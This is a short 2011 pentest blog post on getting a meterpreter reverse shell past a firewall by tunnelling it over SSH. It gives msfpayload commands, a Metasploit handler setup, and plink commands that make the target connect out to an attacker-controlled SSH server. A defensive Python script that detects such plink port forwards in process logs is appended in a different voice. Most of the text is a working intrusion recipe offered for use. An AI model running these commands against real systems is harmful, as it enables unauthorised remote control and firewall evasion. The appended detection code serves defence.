Quick notes – Get a meterpreter reverse shell through SSH tunnel

12/03/2011

Scenario:

Let’s say you are able to upload binaries to your target machine (via webshell, black magic, or bribes).

When you upload your meterpreter payload and run it, the firewall kills your session.

Below is a nice trick that you can pull in order to bypass evil firewalls or restrictive rules (keep in mind that sometimes you may need to change the port of your SSH server from 22 to something like 80 or 443).

In my humble opinion, meterpreter shells should never be dropped.

# Linux BackTrack 5 R1 (attacker machine)

  1. Fire up your SSH server.
  2. Generate your meterpreter payload:

msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.1.1 LPORT=4444 X > /path/msf.exe

  3. Drop msf.exe on your target.
  4. Drop plink.exe on your target (the plink build from Quest PuTTY).
  5. Set up a msf handler:

color false
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.1.1
set lport 4444
set exitonsession false
exploit -j

  • Note: Use 127.0.1.1 instead of 127.0.0.1 (otherwise you will have a lot of problems).

On Mac you will have to set up an alias for lo interface:

# ifconfig lo0 alias 127.0.1.1

# Windows (target machine)

  1. Connect to the SSH server and set up the port forwarding:

plink.exe user@ip_of_my_ssh_server -pw mypass -P port -auto_store_key_in_cache -L 127.0.1.1:4444:127.0.1.1:4444

  2. Start msf.exe.

You should get a meterpreter reverse shell.

References:

Resilient SSH Tunneled Meterpreter Session: http://pauldotcom.com/2010/03/resilient-ssh-tunneled-meterpr.html

Quest PuTTY (plink options): http://rc.quest.com/topics/putty/readme/#plinkopt

Dirty notes:

Reverse:

## attacker ##
# I had issues with reverse_https, so I highly recommend reverse_tcp
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.1.1 LPORT=4444 X > /path/msfrev.exe

## target ##
plink.exe user@ip_of_my_ssh_server -pw mypass -P port -auto_store_key_in_cache -L 127.0.1.1:4444:127.0.1.1:4444

Bind:

## attacker ##
msfpayload windows/meterpreter/bind_tcp RHOST=127.0.1.1 LPORT=4444 X > /path/msfbind.exe

## target ##
plink.exe user@ip_of_my_ssh_server -pw mypass -P port -auto_store_key_in_cache -R 127.0.1.1:4444:127.0.1.1:4444
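From the blue-team side, the same plink command lines above (both the -L reverse and the -R bind variant) are what a process-creation log on the target would record. The following is an added detection example, not code from the original post: it scans constructed Sysmon/EDR-style command lines for SSH client invocations carrying a -L or -R forward, parses the forward spec, and flags the loopback-to-loopback pattern, a non-default -P port and a -pw password on the command line. The sample command lines, the client binary names and the loopback default for a three-part forward spec are my assumptions.

```python
import re
import shlex
from dataclasses import dataclass

# Constructed sample process-creation command lines (not taken from the post).
SAMPLE_CMDLINES = [
    "plink.exe user@203.0.113.10 -pw mypass -P 443 -auto_store_key_in_cache -L 127.0.1.1:4444:127.0.1.1:4444",
    "plink.exe user@203.0.113.10 -pw mypass -P 22 -R 127.0.1.1:4444:127.0.1.1:4444",
    r"C:\Tools\plink.exe -batch admin@fileserver.example -P 22 ls /srv",
]
SSH_CLIENTS = {"plink.exe", "plink", "ssh.exe", "ssh"}   # assumed client binary names
FORWARD_FLAGS = {"-L": "local", "-R": "remote"}
LOOPBACK = re.compile(r"^(127\.\d+\.\d+\.\d+|localhost)$", re.IGNORECASE)

@dataclass
class Finding:
    direction: str              # "local" for -L, "remote" for -R
    forward: tuple              # (listen_addr, listen_port, dest_host, dest_port)
    ssh_port: int               # port given with plink's -P (22 when absent)
    password_on_cmdline: bool   # -pw puts the secret in process listings
    loopback_to_loopback: bool  # both ends on loopback: the tunnelling pattern above

def parse_forward(spec):
    """Split '[listen_addr:]listen_port:dest_host:dest_port' into its four fields."""
    parts = spec.split(":")
    if len(parts) == 3:   # no listen address: assume the client binds to loopback
        parts.insert(0, "127.0.0.1")
    if len(parts) != 4:
        raise ValueError(f"unrecognised forward spec: {spec!r}")
    return parts[0], int(parts[1]), parts[2], int(parts[3])

def analyze(cmdline):
    """Return a Finding when an SSH client is started with a -L or -R forward, else None."""
    argv = shlex.split(cmdline, posix=False)
    if not argv or argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower() not in SSH_CLIENTS:
        return None
    ssh_port, password, forward = 22, False, None
    for i, tok in enumerate(argv):
        nxt = argv[i + 1] if i + 1 < len(argv) else None
        if tok == "-P" and nxt:
            ssh_port = int(nxt)
        elif tok == "-pw":
            password = True
        elif tok in FORWARD_FLAGS and nxt:
            forward = (FORWARD_FLAGS[tok], nxt)
    if forward is None:
        return None
    addr, lport, host, dport = parse_forward(forward[1])
    return Finding(forward[0], (addr, lport, host, dport), ssh_port, password,
                   bool(LOOPBACK.match(addr) and LOOPBACK.match(host)))
```

A plain administrative plink session without a forward (the third sample) yields no finding, so the rule keys on the forward itself rather than on the binary name alone.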
You are currently reading Quick notes – Get a meterpreter reverse shell through SSH tunnel at hdesser.